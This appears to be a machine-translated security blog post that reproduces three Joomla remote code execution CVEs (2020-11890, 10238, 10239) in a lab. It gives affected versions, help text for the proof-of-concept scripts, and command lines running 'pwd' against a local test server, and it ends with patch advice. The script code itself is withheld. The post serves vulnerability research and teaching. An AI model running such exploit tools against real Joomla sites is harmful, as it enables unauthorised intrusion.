JoomlaRCE Remote Code Execution -CVE-2020-11890-10238-10239(three) reprise

JoomlaRCE remote code execution

Cve-2020-11890 <3.9.17 Remote Command Execution Vulnerability CVE-2020-10238 <= 3.9.15 Remote Command Execution Vulnerability CVE-2020-10239 3.7.0 to 3.9.15 Remote Command execution VulnerabilityCopy the code

Ii. Details of vulnerabilities:

Joomla! Is an Open Source, cross-platform content management system (CMS) developed by the Open Source Matters team using PHP and MySQL.

This vulnerability number has been assigned and details will be updated soon.

Affected version:

CVE-2020-11890 <3.9.17  
CVE-2020-10238 <= 3.9.15 
CVE-2020-10239 3.7.0 to 3.9.15 
Copy the code

Iii. Experimental Recurrence Environment:

Downloads.joomla.org/cms/joomla3…

Background reply “Joomla2020” obtain the environment and POC

Installation environment process:

Filling in configuration Information

Database information

Profile information

The installation is complete

A successful login

Environment Installation succeeded

4. Vulnerability recurrence verification

1. Vulnerability verification

CVE-2020-11890

Example script parameters:

➜ thelostworld Qualify Python2 CVE-2020-11890.py -h Usage: CVE-2020-11890.py [-h] -url URL -u USERNAME -p PASSWORD [-usuper USERNAMESUPER] [-psuper PASSWORDSUPER] [-esuper EMAILSUPER] [-cmd COMMAND] optional arguments: -h, --help show this help message and exit -url URL, --url URL URL for your Joomla target -u USERNAME, --username USERNAME username -p PASSWORD, --password PASSWORD password -usuper USERNAMESUPER, --usernamesuper USERNAMESUPER Super's username -psuper PASSWORDSUPER, --passwordsuper PASSWORDSUPER Super's password -esuper EMAILSUPER, --emailsuper EMAILSUPER Super's Email -cmd COMMAND, --command COMMAND commandCopy the code

Command executed successfully

Python2 cve202011890. Py - url http://192.168.0.102:8080 - u thelostworld -p thelostworld -cmd PWDCopy the code

2. Vulnerability verification

CVE-2020-10238

Example script parameters:

➜ thelostworld Qualify Python2 RCE.py -h Usage: RCE.py [-h] -url URL -u USERNAME -p PASSWORD [-cmd COMMAND] optional arguments: -h, --help show this help message and exit -url URL, --url URL URL for your Joomla target -u USERNAME, --username USERNAME username -p PASSWORD, --password PASSWORD password -cmd COMMAND, --command COMMAND commandCopy the code

Execute successfully

Python2 RCE. Py - url http://192.168.0.102:8080 - u thelostworld -p thelostworld -cmd PWDCopy the code

2. Vulnerability verification

CVE-2020-10239

Example script parameters:

➜ thelostworld Qualify Python2 CVE202010239. py -h Usage: cve202010239.py [-h] -url URL -u USERNAME -p PASSWORD [-cmd COMMAND] optional arguments: -h, --help show this help message and exit -url URL, --url URL URL for your Joomla target -u USERNAME, --username USERNAME username -p PASSWORD, --password PASSWORD password -cmd COMMAND, --command COMMAND commandCopy the code

Execute successfully

Python2 cve202010239. Py - url http://192.168.0.102:8080 - u thelostworld -p thelostworld -cmd PWDCopy the code

Vi. Vulnerability repair:

Official website to download the latest version and team patches:

Downloads.joomla.org/

Reference links:

www.secfree.com/vul-141066….

wiki.0-sec.org/?q=joomla

Background reply “Joomla2020” obtain the environment and POC

Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!

Subscribe for more revisited articles and study notes

thelostworld

Safe road, side by side with you ！！！！

Personal knowledge: www.zhihu.com/people/fu-w…

Brief personal book: www.jianshu.com/u/bf0e38a8d…

JoomlaRCE Remote Code Execution -CVE-2020-11890-10238-10239(three) reprise

Related Posts

Comments, I don’t care about the code tonight, I just want you

Python captures packages and parses JSON crawlers! This is crawler must content!

The belated 2018 year-end review